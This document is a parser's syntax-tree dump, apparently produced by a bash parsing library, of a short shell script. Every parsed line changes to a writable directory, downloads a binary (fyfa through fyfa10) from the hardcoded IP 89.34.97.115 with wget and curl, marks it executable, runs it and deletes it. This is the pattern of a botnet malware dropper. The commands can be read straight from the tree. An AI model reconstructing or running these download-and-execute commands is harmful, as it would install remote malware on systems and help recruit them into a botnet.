ListNode(lineno=2, pos=(12, 166), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 96), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 96), word='http://89.34.97.115/fyfa'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(96, 97)),
  CommandNode(lineno=2, pos=(98, 130), parts=[
    WordNode(lineno=2, pos=(98, 102), word='curl'),
    WordNode(lineno=2, pos=(103, 105), word='-O'),
    WordNode(lineno=2, pos=(106, 130), word='http://89.34.97.115/fyfa'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(130, 131)),
  CommandNode(lineno=2, pos=(132, 145), parts=[
    WordNode(lineno=2, pos=(132, 137), word='chmod'),
    WordNode(lineno=2, pos=(138, 140), word='+x'),
    WordNode(lineno=2, pos=(141, 145), word='fyfa'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(145, 146)),
  CommandNode(lineno=2, pos=(147, 153), parts=[
    WordNode(lineno=2, pos=(147, 153), word='./fyfa'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(153, 154)),
  CommandNode(lineno=2, pos=(155, 166), parts=[
    WordNode(lineno=2, pos=(155, 157), word='rm'),
    WordNode(lineno=2, pos=(158, 161), word='-rf'),
    WordNode(lineno=2, pos=(162, 166), word='fyfa'),
  ]),
])
ListNode(lineno=3, pos=(167, 326), parts=[
  CommandNode(lineno=3, pos=(167, 174), parts=[
    WordNode(lineno=3, pos=(167, 169), word='cd'),
    WordNode(lineno=3, pos=(170, 174), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(175, 177)),
  CommandNode(lineno=3, pos=(178, 189), parts=[
    WordNode(lineno=3, pos=(178, 180), word='cd'),
    WordNode(lineno=3, pos=(181, 189), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(190, 192)),
  CommandNode(lineno=3, pos=(193, 200), parts=[
    WordNode(lineno=3, pos=(193, 195), word='cd'),
    WordNode(lineno=3, pos=(196, 200), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(201, 203)),
  CommandNode(lineno=3, pos=(204, 212), parts=[
    WordNode(lineno=3, pos=(204, 206), word='cd'),
    WordNode(lineno=3, pos=(207, 212), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(213, 215)),
  CommandNode(lineno=3, pos=(216, 220), parts=[
    WordNode(lineno=3, pos=(216, 218), word='cd'),
    WordNode(lineno=3, pos=(219, 220), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(220, 221)),
  CommandNode(lineno=3, pos=(222, 252), parts=[
    WordNode(lineno=3, pos=(222, 226), word='wget'),
    WordNode(lineno=3, pos=(227, 252), word='http://89.34.97.115/fyfa1'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(252, 253)),
  CommandNode(lineno=3, pos=(254, 287), parts=[
    WordNode(lineno=3, pos=(254, 258), word='curl'),
    WordNode(lineno=3, pos=(259, 261), word='-O'),
    WordNode(lineno=3, pos=(262, 287), word='http://89.34.97.115/fyfa1'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(287, 288)),
  CommandNode(lineno=3, pos=(289, 303), parts=[
    WordNode(lineno=3, pos=(289, 294), word='chmod'),
    WordNode(lineno=3, pos=(295, 297), word='+x'),
    WordNode(lineno=3, pos=(298, 303), word='fyfa1'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(303, 304)),
  CommandNode(lineno=3, pos=(305, 312), parts=[
    WordNode(lineno=3, pos=(305, 312), word='./fyfa1'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(312, 313)),
  CommandNode(lineno=3, pos=(314, 326), parts=[
    WordNode(lineno=3, pos=(314, 316), word='rm'),
    WordNode(lineno=3, pos=(317, 320), word='-rf'),
    WordNode(lineno=3, pos=(321, 326), word='fyfa1'),
  ]),
])
ListNode(lineno=4, pos=(327, 486), parts=[
  CommandNode(lineno=4, pos=(327, 334), parts=[
    WordNode(lineno=4, pos=(327, 329), word='cd'),
    WordNode(lineno=4, pos=(330, 334), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(335, 337)),
  CommandNode(lineno=4, pos=(338, 349), parts=[
    WordNode(lineno=4, pos=(338, 340), word='cd'),
    WordNode(lineno=4, pos=(341, 349), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(350, 352)),
  CommandNode(lineno=4, pos=(353, 360), parts=[
    WordNode(lineno=4, pos=(353, 355), word='cd'),
    WordNode(lineno=4, pos=(356, 360), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(361, 363)),
  CommandNode(lineno=4, pos=(364, 372), parts=[
    WordNode(lineno=4, pos=(364, 366), word='cd'),
    WordNode(lineno=4, pos=(367, 372), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(373, 375)),
  CommandNode(lineno=4, pos=(376, 380), parts=[
    WordNode(lineno=4, pos=(376, 378), word='cd'),
    WordNode(lineno=4, pos=(379, 380), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(380, 381)),
  CommandNode(lineno=4, pos=(382, 412), parts=[
    WordNode(lineno=4, pos=(382, 386), word='wget'),
    WordNode(lineno=4, pos=(387, 412), word='http://89.34.97.115/fyfa2'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(412, 413)),
  CommandNode(lineno=4, pos=(414, 447), parts=[
    WordNode(lineno=4, pos=(414, 418), word='curl'),
    WordNode(lineno=4, pos=(419, 421), word='-O'),
    WordNode(lineno=4, pos=(422, 447), word='http://89.34.97.115/fyfa2'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(447, 448)),
  CommandNode(lineno=4, pos=(449, 463), parts=[
    WordNode(lineno=4, pos=(449, 454), word='chmod'),
    WordNode(lineno=4, pos=(455, 457), word='+x'),
    WordNode(lineno=4, pos=(458, 463), word='fyfa2'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(463, 464)),
  CommandNode(lineno=4, pos=(465, 472), parts=[
    WordNode(lineno=4, pos=(465, 472), word='./fyfa2'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(472, 473)),
  CommandNode(lineno=4, pos=(474, 486), parts=[
    WordNode(lineno=4, pos=(474, 476), word='rm'),
    WordNode(lineno=4, pos=(477, 480), word='-rf'),
    WordNode(lineno=4, pos=(481, 486), word='fyfa2'),
  ]),
])
ListNode(lineno=5, pos=(487, 646), parts=[
  CommandNode(lineno=5, pos=(487, 494), parts=[
    WordNode(lineno=5, pos=(487, 489), word='cd'),
    WordNode(lineno=5, pos=(490, 494), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(495, 497)),
  CommandNode(lineno=5, pos=(498, 509), parts=[
    WordNode(lineno=5, pos=(498, 500), word='cd'),
    WordNode(lineno=5, pos=(501, 509), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(510, 512)),
  CommandNode(lineno=5, pos=(513, 520), parts=[
    WordNode(lineno=5, pos=(513, 515), word='cd'),
    WordNode(lineno=5, pos=(516, 520), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(521, 523)),
  CommandNode(lineno=5, pos=(524, 532), parts=[
    WordNode(lineno=5, pos=(524, 526), word='cd'),
    WordNode(lineno=5, pos=(527, 532), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(533, 535)),
  CommandNode(lineno=5, pos=(536, 540), parts=[
    WordNode(lineno=5, pos=(536, 538), word='cd'),
    WordNode(lineno=5, pos=(539, 540), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(540, 541)),
  CommandNode(lineno=5, pos=(542, 572), parts=[
    WordNode(lineno=5, pos=(542, 546), word='wget'),
    WordNode(lineno=5, pos=(547, 572), word='http://89.34.97.115/fyfa3'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(572, 573)),
  CommandNode(lineno=5, pos=(574, 607), parts=[
    WordNode(lineno=5, pos=(574, 578), word='curl'),
    WordNode(lineno=5, pos=(579, 581), word='-O'),
    WordNode(lineno=5, pos=(582, 607), word='http://89.34.97.115/fyfa3'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(607, 608)),
  CommandNode(lineno=5, pos=(609, 623), parts=[
    WordNode(lineno=5, pos=(609, 614), word='chmod'),
    WordNode(lineno=5, pos=(615, 617), word='+x'),
    WordNode(lineno=5, pos=(618, 623), word='fyfa3'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(623, 624)),
  CommandNode(lineno=5, pos=(625, 632), parts=[
    WordNode(lineno=5, pos=(625, 632), word='./fyfa3'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(632, 633)),
  CommandNode(lineno=5, pos=(634, 646), parts=[
    WordNode(lineno=5, pos=(634, 636), word='rm'),
    WordNode(lineno=5, pos=(637, 640), word='-rf'),
    WordNode(lineno=5, pos=(641, 646), word='fyfa3'),
  ]),
])
ListNode(lineno=6, pos=(647, 806), parts=[
  CommandNode(lineno=6, pos=(647, 654), parts=[
    WordNode(lineno=6, pos=(647, 649), word='cd'),
    WordNode(lineno=6, pos=(650, 654), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(655, 657)),
  CommandNode(lineno=6, pos=(658, 669), parts=[
    WordNode(lineno=6, pos=(658, 660), word='cd'),
    WordNode(lineno=6, pos=(661, 669), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(670, 672)),
  CommandNode(lineno=6, pos=(673, 680), parts=[
    WordNode(lineno=6, pos=(673, 675), word='cd'),
    WordNode(lineno=6, pos=(676, 680), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(681, 683)),
  CommandNode(lineno=6, pos=(684, 692), parts=[
    WordNode(lineno=6, pos=(684, 686), word='cd'),
    WordNode(lineno=6, pos=(687, 692), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(693, 695)),
  CommandNode(lineno=6, pos=(696, 700), parts=[
    WordNode(lineno=6, pos=(696, 698), word='cd'),
    WordNode(lineno=6, pos=(699, 700), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(700, 701)),
  CommandNode(lineno=6, pos=(702, 732), parts=[
    WordNode(lineno=6, pos=(702, 706), word='wget'),
    WordNode(lineno=6, pos=(707, 732), word='http://89.34.97.115/fyfa4'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(732, 733)),
  CommandNode(lineno=6, pos=(734, 767), parts=[
    WordNode(lineno=6, pos=(734, 738), word='curl'),
    WordNode(lineno=6, pos=(739, 741), word='-O'),
    WordNode(lineno=6, pos=(742, 767), word='http://89.34.97.115/fyfa4'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(767, 768)),
  CommandNode(lineno=6, pos=(769, 783), parts=[
    WordNode(lineno=6, pos=(769, 774), word='chmod'),
    WordNode(lineno=6, pos=(775, 777), word='+x'),
    WordNode(lineno=6, pos=(778, 783), word='fyfa4'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(783, 784)),
  CommandNode(lineno=6, pos=(785, 792), parts=[
    WordNode(lineno=6, pos=(785, 792), word='./fyfa4'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(792, 793)),
  CommandNode(lineno=6, pos=(794, 806), parts=[
    WordNode(lineno=6, pos=(794, 796), word='rm'),
    WordNode(lineno=6, pos=(797, 800), word='-rf'),
    WordNode(lineno=6, pos=(801, 806), word='fyfa4'),
  ]),
])
ListNode(lineno=7, pos=(807, 966), parts=[
  CommandNode(lineno=7, pos=(807, 814), parts=[
    WordNode(lineno=7, pos=(807, 809), word='cd'),
    WordNode(lineno=7, pos=(810, 814), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(815, 817)),
  CommandNode(lineno=7, pos=(818, 829), parts=[
    WordNode(lineno=7, pos=(818, 820), word='cd'),
    WordNode(lineno=7, pos=(821, 829), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(830, 832)),
  CommandNode(lineno=7, pos=(833, 840), parts=[
    WordNode(lineno=7, pos=(833, 835), word='cd'),
    WordNode(lineno=7, pos=(836, 840), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(841, 843)),
  CommandNode(lineno=7, pos=(844, 852), parts=[
    WordNode(lineno=7, pos=(844, 846), word='cd'),
    WordNode(lineno=7, pos=(847, 852), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(853, 855)),
  CommandNode(lineno=7, pos=(856, 860), parts=[
    WordNode(lineno=7, pos=(856, 858), word='cd'),
    WordNode(lineno=7, pos=(859, 860), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(860, 861)),
  CommandNode(lineno=7, pos=(862, 892), parts=[
    WordNode(lineno=7, pos=(862, 866), word='wget'),
    WordNode(lineno=7, pos=(867, 892), word='http://89.34.97.115/fyfa5'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(892, 893)),
  CommandNode(lineno=7, pos=(894, 927), parts=[
    WordNode(lineno=7, pos=(894, 898), word='curl'),
    WordNode(lineno=7, pos=(899, 901), word='-O'),
    WordNode(lineno=7, pos=(902, 927), word='http://89.34.97.115/fyfa5'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(927, 928)),
  CommandNode(lineno=7, pos=(929, 943), parts=[
    WordNode(lineno=7, pos=(929, 934), word='chmod'),
    WordNode(lineno=7, pos=(935, 937), word='+x'),
    WordNode(lineno=7, pos=(938, 943), word='fyfa5'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(943, 944)),
  CommandNode(lineno=7, pos=(945, 952), parts=[
    WordNode(lineno=7, pos=(945, 952), word='./fyfa5'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(952, 953)),
  CommandNode(lineno=7, pos=(954, 966), parts=[
    WordNode(lineno=7, pos=(954, 956), word='rm'),
    WordNode(lineno=7, pos=(957, 960), word='-rf'),
    WordNode(lineno=7, pos=(961, 966), word='fyfa5'),
  ]),
])
ListNode(lineno=8, pos=(967, 1126), parts=[
  CommandNode(lineno=8, pos=(967, 974), parts=[
    WordNode(lineno=8, pos=(967, 969), word='cd'),
    WordNode(lineno=8, pos=(970, 974), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(975, 977)),
  CommandNode(lineno=8, pos=(978, 989), parts=[
    WordNode(lineno=8, pos=(978, 980), word='cd'),
    WordNode(lineno=8, pos=(981, 989), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(990, 992)),
  CommandNode(lineno=8, pos=(993, 1000), parts=[
    WordNode(lineno=8, pos=(993, 995), word='cd'),
    WordNode(lineno=8, pos=(996, 1000), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1001, 1003)),
  CommandNode(lineno=8, pos=(1004, 1012), parts=[
    WordNode(lineno=8, pos=(1004, 1006), word='cd'),
    WordNode(lineno=8, pos=(1007, 1012), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1013, 1015)),
  CommandNode(lineno=8, pos=(1016, 1020), parts=[
    WordNode(lineno=8, pos=(1016, 1018), word='cd'),
    WordNode(lineno=8, pos=(1019, 1020), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1020, 1021)),
  CommandNode(lineno=8, pos=(1022, 1052), parts=[
    WordNode(lineno=8, pos=(1022, 1026), word='wget'),
    WordNode(lineno=8, pos=(1027, 1052), word='http://89.34.97.115/fyfa6'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1052, 1053)),
  CommandNode(lineno=8, pos=(1054, 1087), parts=[
    WordNode(lineno=8, pos=(1054, 1058), word='curl'),
    WordNode(lineno=8, pos=(1059, 1061), word='-O'),
    WordNode(lineno=8, pos=(1062, 1087), word='http://89.34.97.115/fyfa6'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1087, 1088)),
  CommandNode(lineno=8, pos=(1089, 1103), parts=[
    WordNode(lineno=8, pos=(1089, 1094), word='chmod'),
    WordNode(lineno=8, pos=(1095, 1097), word='+x'),
    WordNode(lineno=8, pos=(1098, 1103), word='fyfa6'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1103, 1104)),
  CommandNode(lineno=8, pos=(1105, 1112), parts=[
    WordNode(lineno=8, pos=(1105, 1112), word='./fyfa6'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1112, 1113)),
  CommandNode(lineno=8, pos=(1114, 1126), parts=[
    WordNode(lineno=8, pos=(1114, 1116), word='rm'),
    WordNode(lineno=8, pos=(1117, 1120), word='-rf'),
    WordNode(lineno=8, pos=(1121, 1126), word='fyfa6'),
  ]),
])
ListNode(lineno=9, pos=(1127, 1286), parts=[
  CommandNode(lineno=9, pos=(1127, 1134), parts=[
    WordNode(lineno=9, pos=(1127, 1129), word='cd'),
    WordNode(lineno=9, pos=(1130, 1134), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1135, 1137)),
  CommandNode(lineno=9, pos=(1138, 1149), parts=[
    WordNode(lineno=9, pos=(1138, 1140), word='cd'),
    WordNode(lineno=9, pos=(1141, 1149), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1150, 1152)),
  CommandNode(lineno=9, pos=(1153, 1160), parts=[
    WordNode(lineno=9, pos=(1153, 1155), word='cd'),
    WordNode(lineno=9, pos=(1156, 1160), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1161, 1163)),
  CommandNode(lineno=9, pos=(1164, 1172), parts=[
    WordNode(lineno=9, pos=(1164, 1166), word='cd'),
    WordNode(lineno=9, pos=(1167, 1172), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1173, 1175)),
  CommandNode(lineno=9, pos=(1176, 1180), parts=[
    WordNode(lineno=9, pos=(1176, 1178), word='cd'),
    WordNode(lineno=9, pos=(1179, 1180), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1180, 1181)),
  CommandNode(lineno=9, pos=(1182, 1212), parts=[
    WordNode(lineno=9, pos=(1182, 1186), word='wget'),
    WordNode(lineno=9, pos=(1187, 1212), word='http://89.34.97.115/fyfa7'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1212, 1213)),
  CommandNode(lineno=9, pos=(1214, 1247), parts=[
    WordNode(lineno=9, pos=(1214, 1218), word='curl'),
    WordNode(lineno=9, pos=(1219, 1221), word='-O'),
    WordNode(lineno=9, pos=(1222, 1247), word='http://89.34.97.115/fyfa7'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1247, 1248)),
  CommandNode(lineno=9, pos=(1249, 1263), parts=[
    WordNode(lineno=9, pos=(1249, 1254), word='chmod'),
    WordNode(lineno=9, pos=(1255, 1257), word='+x'),
    WordNode(lineno=9, pos=(1258, 1263), word='fyfa7'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1263, 1264)),
  CommandNode(lineno=9, pos=(1265, 1272), parts=[
    WordNode(lineno=9, pos=(1265, 1272), word='./fyfa7'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1272, 1273)),
  CommandNode(lineno=9, pos=(1274, 1286), parts=[
    WordNode(lineno=9, pos=(1274, 1276), word='rm'),
    WordNode(lineno=9, pos=(1277, 1280), word='-rf'),
    WordNode(lineno=9, pos=(1281, 1286), word='fyfa7'),
  ]),
])
ListNode(lineno=10, pos=(1287, 1446), parts=[
  CommandNode(lineno=10, pos=(1287, 1294), parts=[
    WordNode(lineno=10, pos=(1287, 1289), word='cd'),
    WordNode(lineno=10, pos=(1290, 1294), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1295, 1297)),
  CommandNode(lineno=10, pos=(1298, 1309), parts=[
    WordNode(lineno=10, pos=(1298, 1300), word='cd'),
    WordNode(lineno=10, pos=(1301, 1309), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1310, 1312)),
  CommandNode(lineno=10, pos=(1313, 1320), parts=[
    WordNode(lineno=10, pos=(1313, 1315), word='cd'),
    WordNode(lineno=10, pos=(1316, 1320), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1321, 1323)),
  CommandNode(lineno=10, pos=(1324, 1332), parts=[
    WordNode(lineno=10, pos=(1324, 1326), word='cd'),
    WordNode(lineno=10, pos=(1327, 1332), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1333, 1335)),
  CommandNode(lineno=10, pos=(1336, 1340), parts=[
    WordNode(lineno=10, pos=(1336, 1338), word='cd'),
    WordNode(lineno=10, pos=(1339, 1340), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1340, 1341)),
  CommandNode(lineno=10, pos=(1342, 1372), parts=[
    WordNode(lineno=10, pos=(1342, 1346), word='wget'),
    WordNode(lineno=10, pos=(1347, 1372), word='http://89.34.97.115/fyfa8'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1372, 1373)),
  CommandNode(lineno=10, pos=(1374, 1407), parts=[
    WordNode(lineno=10, pos=(1374, 1378), word='curl'),
    WordNode(lineno=10, pos=(1379, 1381), word='-O'),
    WordNode(lineno=10, pos=(1382, 1407), word='http://89.34.97.115/fyfa8'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1407, 1408)),
  CommandNode(lineno=10, pos=(1409, 1423), parts=[
    WordNode(lineno=10, pos=(1409, 1414), word='chmod'),
    WordNode(lineno=10, pos=(1415, 1417), word='+x'),
    WordNode(lineno=10, pos=(1418, 1423), word='fyfa8'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1423, 1424)),
  CommandNode(lineno=10, pos=(1425, 1432), parts=[
    WordNode(lineno=10, pos=(1425, 1432), word='./fyfa8'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1432, 1433)),
  CommandNode(lineno=10, pos=(1434, 1446), parts=[
    WordNode(lineno=10, pos=(1434, 1436), word='rm'),
    WordNode(lineno=10, pos=(1437, 1440), word='-rf'),
    WordNode(lineno=10, pos=(1441, 1446), word='fyfa8'),
  ]),
])
ListNode(lineno=11, pos=(1447, 1606), parts=[
  CommandNode(lineno=11, pos=(1447, 1454), parts=[
    WordNode(lineno=11, pos=(1447, 1449), word='cd'),
    WordNode(lineno=11, pos=(1450, 1454), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1455, 1457)),
  CommandNode(lineno=11, pos=(1458, 1469), parts=[
    WordNode(lineno=11, pos=(1458, 1460), word='cd'),
    WordNode(lineno=11, pos=(1461, 1469), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1470, 1472)),
  CommandNode(lineno=11, pos=(1473, 1480), parts=[
    WordNode(lineno=11, pos=(1473, 1475), word='cd'),
    WordNode(lineno=11, pos=(1476, 1480), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1481, 1483)),
  CommandNode(lineno=11, pos=(1484, 1492), parts=[
    WordNode(lineno=11, pos=(1484, 1486), word='cd'),
    WordNode(lineno=11, pos=(1487, 1492), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1493, 1495)),
  CommandNode(lineno=11, pos=(1496, 1500), parts=[
    WordNode(lineno=11, pos=(1496, 1498), word='cd'),
    WordNode(lineno=11, pos=(1499, 1500), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1500, 1501)),
  CommandNode(lineno=11, pos=(1502, 1532), parts=[
    WordNode(lineno=11, pos=(1502, 1506), word='wget'),
    WordNode(lineno=11, pos=(1507, 1532), word='http://89.34.97.115/fyfa9'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1532, 1533)),
  CommandNode(lineno=11, pos=(1534, 1567), parts=[
    WordNode(lineno=11, pos=(1534, 1538), word='curl'),
    WordNode(lineno=11, pos=(1539, 1541), word='-O'),
    WordNode(lineno=11, pos=(1542, 1567), word='http://89.34.97.115/fyfa9'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1567, 1568)),
  CommandNode(lineno=11, pos=(1569, 1583), parts=[
    WordNode(lineno=11, pos=(1569, 1574), word='chmod'),
    WordNode(lineno=11, pos=(1575, 1577), word='+x'),
    WordNode(lineno=11, pos=(1578, 1583), word='fyfa9'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1583, 1584)),
  CommandNode(lineno=11, pos=(1585, 1592), parts=[
    WordNode(lineno=11, pos=(1585, 1592), word='./fyfa9'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1592, 1593)),
  CommandNode(lineno=11, pos=(1594, 1606), parts=[
    WordNode(lineno=11, pos=(1594, 1596), word='rm'),
    WordNode(lineno=11, pos=(1597, 1600), word='-rf'),
    WordNode(lineno=11, pos=(1601, 1606), word='fyfa9'),
  ]),
])
ListNode(lineno=12, pos=(1607, 1771), parts=[
  CommandNode(lineno=12, pos=(1607, 1614), parts=[
    WordNode(lineno=12, pos=(1607, 1609), word='cd'),
    WordNode(lineno=12, pos=(1610, 1614), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1615, 1617)),
  CommandNode(lineno=12, pos=(1618, 1629), parts=[
    WordNode(lineno=12, pos=(1618, 1620), word='cd'),
    WordNode(lineno=12, pos=(1621, 1629), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1630, 1632)),
  CommandNode(lineno=12, pos=(1633, 1640), parts=[
    WordNode(lineno=12, pos=(1633, 1635), word='cd'),
    WordNode(lineno=12, pos=(1636, 1640), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1641, 1643)),
  CommandNode(lineno=12, pos=(1644, 1652), parts=[
    WordNode(lineno=12, pos=(1644, 1646), word='cd'),
    WordNode(lineno=12, pos=(1647, 1652), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1653, 1655)),
  CommandNode(lineno=12, pos=(1656, 1660), parts=[
    WordNode(lineno=12, pos=(1656, 1658), word='cd'),
    WordNode(lineno=12, pos=(1659, 1660), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1660, 1661)),
  CommandNode(lineno=12, pos=(1662, 1693), parts=[
    WordNode(lineno=12, pos=(1662, 1666), word='wget'),
    WordNode(lineno=12, pos=(1667, 1693), word='http://89.34.97.115/fyfa10'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1693, 1694)),
  CommandNode(lineno=12, pos=(1695, 1729), parts=[
    WordNode(lineno=12, pos=(1695, 1699), word='curl'),
    WordNode(lineno=12, pos=(1700, 1702), word='-O'),
    WordNode(lineno=12, pos=(1703, 1729), word='http://89.34.97.115/fyfa10'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1729, 1730)),
  CommandNode(lineno=12, pos=(1731, 1746), parts=[
    WordNode(lineno=12, pos=(1731, 1736), word='chmod'),
    WordNode(lineno=12, pos=(1737, 1739), word='+x'),
    WordNode(lineno=12, pos=(1740, 1746), word='fyfa10'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1746, 1747)),
  CommandNode(lineno=12, pos=(1748, 1756), parts=[
    WordNode(lineno=12, pos=(1748, 1756), word='./fyfa10'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1756, 1757)),
  CommandNode(lineno=12, pos=(1758, 1771), parts=[
    WordNode(lineno=12, pos=(1758, 1760), word='rm'),
    WordNode(lineno=12, pos=(1761, 1764), word='-rf'),
    WordNode(lineno=12, pos=(1765, 1771), word='fyfa10'),
  ]),
])
